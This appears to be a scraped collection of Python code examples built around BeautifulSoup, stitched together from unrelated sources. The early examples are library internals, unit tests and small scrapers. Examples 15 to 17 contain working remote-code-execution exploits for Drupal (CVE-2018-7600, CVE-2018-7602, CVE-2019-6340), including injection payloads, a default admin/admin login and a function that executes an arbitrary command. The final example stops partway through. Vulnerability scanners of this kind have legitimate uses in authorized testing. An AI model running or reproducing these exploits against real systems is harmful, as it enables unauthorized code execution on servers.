Example #1
 def fragmentClass(self):
     from thirdparty.bs4 import BeautifulSoup
     # TODO: Why is the parser 'html.parser' here? To avoid an
     # infinite loop?
     self.soup = BeautifulSoup("", "html.parser")
     self.soup.name = "[document_fragment]"
     return Element(self.soup, self.soup, None)
Example #2
    def assertSoupEquals(self, to_parse, compare_parsed_to=None):
        builder = self.default_builder
        obj = BeautifulSoup(to_parse, builder=builder)
        if compare_parsed_to is None:
            compare_parsed_to = to_parse

        self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
Example #3
    def test_custom_builder_class(self):
        # Verify that you can pass in a custom Builder class and
        # it'll be instantiated with the appropriate keyword arguments.
        class Mock(object):
            def __init__(self, **kwargs):
                self.called_with = kwargs
                self.is_xml = True
                self.store_line_numbers = False
                self.cdata_list_attributes = []
                self.preserve_whitespace_tags = []
                self.string_containers = {}

            def initialize_soup(self, soup):
                pass

            def feed(self, markup):
                self.fed = markup

            def reset(self):
                pass

            def ignore(self, ignore):
                pass

            set_up_substitutions = can_be_empty_element = ignore

            def prepare_markup(self, *args, **kwargs):
                yield "prepared markup", "original encoding", "declared encoding", "contains replacement characters"

        kwargs = dict(
            var="value",
            # This is a deprecated BS3-era keyword argument, which
            # will be stripped out.
            convertEntities=True,
        )
        with warnings.catch_warnings(record=True):
            soup = BeautifulSoup('', builder=Mock, **kwargs)
        assert isinstance(soup.builder, Mock)
        self.assertEqual(dict(var="value"), soup.builder.called_with)
        self.assertEqual("prepared markup", soup.builder.fed)

        # You can also instantiate the TreeBuilder yourself. In this
        # case, that specific object is used and any keyword arguments
        # to the BeautifulSoup constructor are ignored.
        builder = Mock(**kwargs)
        with warnings.catch_warnings(record=True) as w:
            soup = BeautifulSoup(
                '',
                builder=builder,
                ignored_value=True,
            )
        msg = str(w[0].message)
        assert msg.startswith(
            "Keyword arguments to the BeautifulSoup constructor will be ignored."
        )
        self.assertEqual(builder, soup.builder)
        self.assertEqual(kwargs, builder.called_with)
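
The same two call patterns work with a real tree builder. A brief sketch, assuming a standard bs4 install (the excerpts in this file import the vendored thirdparty.bs4 path) and the stock HTMLParserTreeBuilder:

from bs4 import BeautifulSoup
from bs4.builder import HTMLParserTreeBuilder

# Pass the class: BeautifulSoup instantiates it itself.
soup = BeautifulSoup("<p>Hello</p>", builder=HTMLParserTreeBuilder)
print(soup.p.string)

# Pass an instance: that exact object is used, and extra keyword
# arguments to the constructor are ignored (with a warning), as the test above shows.
soup = BeautifulSoup("<p>Hello</p>", builder=HTMLParserTreeBuilder())
print(soup.p.string)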
Example #4
    def test_formatter_processes_script_tag_for_xml_documents(self):
        doc = """
  <script type="text/javascript">
  </script>
"""
        soup = BeautifulSoup(doc, "lxml-xml")
        # lxml would have stripped this while parsing, but we can add
        # it later.
        soup.script.string = 'console.log("< < hey > > ");'
        encoded = soup.encode()
        self.assertTrue(b"&lt; &lt; hey &gt; &gt;" in encoded)
Example #5
    def test_beautifulsoup_constructor_does_lookup(self):

        with warnings.catch_warnings(record=True) as w:
            # This will create a warning about not explicitly
            # specifying a parser, but we'll ignore it.

            # You can pass in a string.
            BeautifulSoup("", features="html")
            # Or a list of strings.
            BeautifulSoup("", features=["html", "fast"])

        # You'll get an exception if BS can't find an appropriate
        # builder.
        self.assertRaises(ValueError, BeautifulSoup,
                          "", features="no-such-feature")
Example #6
def ISPCheck(domain):
	try:
		base = 'https://check-host.net/ip-info?host=' + domain
		base_check = requests.get(base).text
		UrlHTML = BeautifulSoup(base_check, "lxml")
		if UrlHTML.findAll('div', {'class': 'error'}):
			return " - cannot retrieve information "
		# Pull the text after "Organization" out of the first matching table row.
		rows = [i for i in UrlHTML.findAll('tr', {'class': 'zebra'}) if 'Organization' in str(i)]
		get_Content = rows[0].get_text(strip=True).split('Organization')[1]
		for cloud in cloudlist:
			if cloud in get_Content:
				return " - belong " + cloud
	except Exception:
		return None
Example #7
def benchmark_parsers(num_elements=100000):
    """Very basic head-to-head performance benchmark."""
    print("Comparative parser benchmark on Beautiful Soup %s" % __version__)
    data = rdoc(num_elements)
    print("Generated a large invalid HTML document (%d bytes)." % len(data))

    for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
        success = False
        try:
            a = time.time()
            soup = BeautifulSoup(data, parser)
            b = time.time()
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("BS4+%s parsed the markup in %.2fs." % (parser, b - a))

    from lxml import etree
    a = time.time()
    etree.HTML(data)
    b = time.time()
    print("Raw lxml parsed the markup in %.2fs." % (b - a))

    from thirdparty import html5lib
    parser = html5lib.HTMLParser()
    a = time.time()
    parser.parse(data)
    b = time.time()
    print("Raw html5lib parsed the markup in %.2fs." % (b - a))
Example #8
    def assertSoupEquals(self, to_parse, compare_parsed_to=None):
        builder = self.default_builder
        obj = BeautifulSoup(to_parse, builder=builder)
        if compare_parsed_to is None:
            compare_parsed_to = to_parse

        # Verify that the documents come out the same.
        self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))

        # Also run some checks on the BeautifulSoup object itself:

        # Verify that every tag that was opened was eventually closed.

        # There are no tags in the open tag counter.
        assert all(v==0 for v in list(obj.open_tag_counter.values()))

        # The only tag in the tag stack is the one for the root
        # document.
        self.assertEqual(
            [obj.ROOT_TAG_NAME], [x.name for x in obj.tagStack]
        )
Example #9
    def __init__(self,
                 namespaceHTMLElements,
                 soup=None,
                 store_line_numbers=True,
                 **kwargs):
        if soup:
            self.soup = soup
        else:
            from thirdparty.bs4 import BeautifulSoup
            # TODO: Why is the parser 'html.parser' here? To avoid an
            # infinite loop?
            self.soup = BeautifulSoup("",
                                      "html.parser",
                                      store_line_numbers=store_line_numbers,
                                      **kwargs)
        # TODO: What are **kwargs exactly? Should they be passed in
        # here in addition to/instead of being passed to the BeautifulSoup
        # constructor?
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

        # This will be set later to an html5lib.html5parser.HTMLParser
        # object, which we can use to track the current line number.
        self.parser = None
        self.store_line_numbers = store_line_numbers
Example #10
    def test_last_ditch_entity_replacement(self):
        # This is a UTF-8 document that contains bytestrings
        # completely incompatible with UTF-8 (ie. encoded with some other
        # encoding).
        #
        # Since there is no consistent encoding for the document,
        # Unicode, Dammit will eventually encode the document as UTF-8
        # and encode the incompatible characters as REPLACEMENT
        # CHARACTER.
        #
        # If chardet is installed, it will detect that the document
        # can be converted into ISO-8859-1 without errors. This happens
        # to be the wrong encoding, but it is a consistent encoding, so the
        # code we're testing here won't run.
        #
        # So we temporarily disable chardet if it's present.
        doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?>
<html><b>\330\250\330\252\330\261</b>
<i>\310\322\321\220\312\321\355\344</i></html>"""
        chardet = bs4.dammit.chardet_dammit
        logging.disable(logging.WARNING)
        try:

            def noop(str):
                return None

            bs4.dammit.chardet_dammit = noop
            dammit = UnicodeDammit(doc)
            self.assertEqual(True, dammit.contains_replacement_characters)
            self.assertTrue("\ufffd" in dammit.unicode_markup)

            soup = BeautifulSoup(doc, "html.parser")
            self.assertTrue(soup.contains_replacement_characters)
        finally:
            logging.disable(logging.NOTSET)
            bs4.dammit.chardet_dammit = chardet
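
For context, a minimal Unicode, Dammit sketch, assuming a standard bs4 install; unicode_markup, original_encoding and contains_replacement_characters are the attributes the test exercises.

from bs4 import UnicodeDammit

dammit = UnicodeDammit(b"Sacr\xe9 bleu!", ["latin-1", "iso-8859-1"])
print(dammit.unicode_markup)                   # 'Sacré bleu!'
print(dammit.original_encoding)                # e.g. 'latin-1'
print(dammit.contains_replacement_characters)  # False: a consistent encoding was found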
Example #11
def searchTitle(domain):
	html = requests.get('http://' + domain).text
	soup = BeautifulSoup(html, 'html.parser')
	title = soup.find('title').string
	return title
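
A slightly more defensive variant, as a sketch; the requests timeout and the missing-<title> guard are additions, not part of the original:

import requests
from bs4 import BeautifulSoup

def search_title(domain, timeout=10):
    """Return the page title for a domain, or None if there is no <title> tag."""
    html = requests.get("http://" + domain, timeout=timeout).text
    soup = BeautifulSoup(html, "html.parser")
    title = soup.find("title")
    return title.string if title else None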
Example #12
class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder):
    def __init__(self,
                 namespaceHTMLElements,
                 soup=None,
                 store_line_numbers=True,
                 **kwargs):
        if soup:
            self.soup = soup
        else:
            from thirdparty.bs4 import BeautifulSoup
            # TODO: Why is the parser 'html.parser' here? To avoid an
            # infinite loop?
            self.soup = BeautifulSoup("",
                                      "html.parser",
                                      store_line_numbers=store_line_numbers,
                                      **kwargs)
        # TODO: What are **kwargs exactly? Should they be passed in
        # here in addition to/instead of being passed to the BeautifulSoup
        # constructor?
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

        # This will be set later to an html5lib.html5parser.HTMLParser
        # object, which we can use to track the current line number.
        self.parser = None
        self.store_line_numbers = store_line_numbers

    def documentClass(self):
        self.soup.reset()
        return Element(self.soup, self.soup, None)

    def insertDoctype(self, token):
        name = token["name"]
        publicId = token["publicId"]
        systemId = token["systemId"]

        doctype = Doctype.for_name_and_ids(name, publicId, systemId)
        self.soup.object_was_parsed(doctype)

    def elementClass(self, name, namespace):
        kwargs = {}
        if self.parser and self.store_line_numbers:
            # This represents the point immediately after the end of the
            # tag. We don't know when the tag started, but we do know
            # where it ended -- the character just before this one.
            sourceline, sourcepos = self.parser.tokenizer.stream.position()
            kwargs['sourceline'] = sourceline
            kwargs['sourcepos'] = sourcepos - 1
        tag = self.soup.new_tag(name, namespace, **kwargs)

        return Element(tag, self.soup, namespace)

    def commentClass(self, data):
        return TextNode(Comment(data), self.soup)

    def fragmentClass(self):
        from thirdparty.bs4 import BeautifulSoup
        # TODO: Why is the parser 'html.parser' here? To avoid an
        # infinite loop?
        self.soup = BeautifulSoup("", "html.parser")
        self.soup.name = "[document_fragment]"
        return Element(self.soup, self.soup, None)

    def appendChild(self, node):
        # XXX This code is not covered by the BS4 tests.
        self.soup.append(node.element)

    def getDocument(self):
        return self.soup

    def getFragment(self):
        return treebuilder_base.TreeBuilder.getFragment(self).element

    def testSerializer(self, element):
        from thirdparty.bs4 import BeautifulSoup
        rv = []
        doctype_re = re.compile(
            r'^(.*?)(?: PUBLIC "(.*?)"(?: "(.*?)")?| SYSTEM "(.*?)")?$')

        def serializeElement(element, indent=0):
            if isinstance(element, BeautifulSoup):
                pass
            if isinstance(element, Doctype):
                m = doctype_re.match(element)
                if m:
                    name = m.group(1)
                    if m.lastindex > 1:
                        publicId = m.group(2) or ""
                        systemId = m.group(3) or m.group(4) or ""
                        rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" %
                                  (' ' * indent, name, publicId, systemId))
                    else:
                        rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, name))
                else:
                    rv.append("|%s<!DOCTYPE >" % (' ' * indent, ))
            elif isinstance(element, Comment):
                rv.append("|%s<!-- %s -->" % (' ' * indent, element))
            elif isinstance(element, NavigableString):
                rv.append("|%s\"%s\"" % (' ' * indent, element))
            else:
                if element.namespace:
                    name = "%s %s" % (prefixes[element.namespace],
                                      element.name)
                else:
                    name = element.name
                rv.append("|%s<%s>" % (' ' * indent, name))
                if element.attrs:
                    attributes = []
                    for name, value in list(element.attrs.items()):
                        if isinstance(name, NamespacedAttribute):
                            name = "%s %s" % (prefixes[name.namespace],
                                              name.name)
                        if isinstance(value, list):
                            value = " ".join(value)
                        attributes.append((name, value))

                    for name, value in sorted(attributes):
                        rv.append('|%s%s="%s"' % (' ' *
                                                  (indent + 2), name, value))
                indent += 2
                for child in element.children:
                    serializeElement(child, indent)

        serializeElement(element, 0)

        return "\n".join(rv)
Example #13
 def test_warning_if_parser_specified_too_vague(self):
     with warnings.catch_warnings(record=True) as w:
         soup = BeautifulSoup("<a><b></b></a>", "html")
     self._assert_no_parser_specified(w)
Example #14
 def soup(self, markup, **kwargs):
     """Build a Beautiful Soup object from markup."""
     builder = kwargs.pop('builder', self.default_builder)
     return BeautifulSoup(markup, builder=builder, **kwargs)
Example #15
 def cve_2018_7602_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Drupal drupalgeddon2 remote code execution"
     self.vul_info["vul_numb"] = "CVE-2018-7602"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2018-06-19"
     self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                 "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                 "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     md = random_md5()
     cmd = "echo " + md
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         if md in misinformation(self.r.text, md):
             self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         else:
             self.request = requests.get(self.url + "/CHANGELOG.txt",
                                         headers=self.headers,
                                         timeout=self.timeout,
                                         verify=False)
             self.rawdata = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                      self.request.text)
             if self.request.status_code == 200 and r"Drupal" in self.request.text:
                 if '7.59' not in self.allver and '8.5.3' not in self.allver:
                     self.vul_info["vul_data"] = dump.dump_all(
                         self.r).decode('utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info[
                         "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                     self.vul_info[
                         "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
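
The BeautifulSoup-specific part of this flow is the form scraping: fetch a page, locate a form by id, and read a hidden input's value. A generic sketch of just that pattern, with a hypothetical helper name and None returned when the form or field is missing:

import requests
from bs4 import BeautifulSoup

def read_hidden_field(session, url, form_id, field_name, **kwargs):
    """Fetch a page and return the value of a hidden <input> inside the given form."""
    r = session.get(url, **kwargs)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find("form", {"id": form_id})
    if form is None:
        return None
    field = form.find("input", {"name": field_name})
    return field.get("value") if field else None

# Hypothetical usage mirroring the code above:
# token = read_hidden_field(session, url, "user-cancel-confirm-form", "form_token", timeout=10)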
Example #16
 def cve_2018_7602_exp(self, cmd):
     vul_name = "Drupal: CVE-2018-7602"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
         verify.exploit_print(self.r.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Example #17
class Drupal():
    def __init__(self, url):
        self.url = url
        if self.url[-1] == "/":
            self.url = self.url[:-1]
        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # 获取全局变量UA
        self.timeout = globals.get_value("TIMEOUT")  # 获取全局变量UA
        self.headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
        self.threadLock = threading.Lock()
        self.payload_cve_2018_7600 = (
            "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail"
            "[#type]=markup&mail[#markup]=RECOMMAND")
        self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \
                                     "GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \
                                     ";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \
                                     "\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \
                                     "\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \
                                     "\"\r\n}\r\n}\r\n}"

    def cve_2018_7600_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7600"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2018_7600.replace(
            "RECOMMAND", "whoami")
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7600"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-04-13"
        self.vul_info["vul_vers"] = "6.x, 7.x, 8.x"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容" \
                                    ",此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        md = random_md5()
        cmd = "echo " + md
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7602_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7602"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-06-19"
        self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                    "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                    "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        md = random_md5()
        cmd = "echo " + md
        try:
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url,
                              params=self.get_params,
                              data=self.post_params,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            self.get_params = {
                'q':
                self.user_id + '/cancel',
                'destination':
                self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
                + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            self.get_params = {
                'q':
                'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            if md in misinformation(self.r.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info[
                    "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                self.request = requests.get(self.url + "/CHANGELOG.txt",
                                            headers=self.headers,
                                            timeout=self.timeout,
                                            verify=False)
                self.rawdata = dump.dump_all(self.request).decode(
                    'utf-8', 'ignore')
                self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                         self.request.text)
                if self.request.status_code == 200 and r"Drupal" in self.request.text:
                    if '7.59' not in self.allver and '8.5.3' not in self.allver:
                        self.vul_info["vul_data"] = dump.dump_all(
                            self.r).decode('utf-8', 'ignore')
                        self.vul_info["prt_resu"] = "PoC_MaYbE"
                        self.vul_info[
                            "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                        self.vul_info[
                            "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2019_6340_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "drupal core restful remote code execution"
        self.vul_info["vul_numb"] = "CVE-2019-6340"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2019-02-22"
        self.vul_info["vul_vers"] = "< 8.6.10"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
                                    "函数而触发反序列化漏洞,进而导致任意代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        self.path = "/node/?_format=hal_json"
        md = random_md5()
        cmd = "echo " + md
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
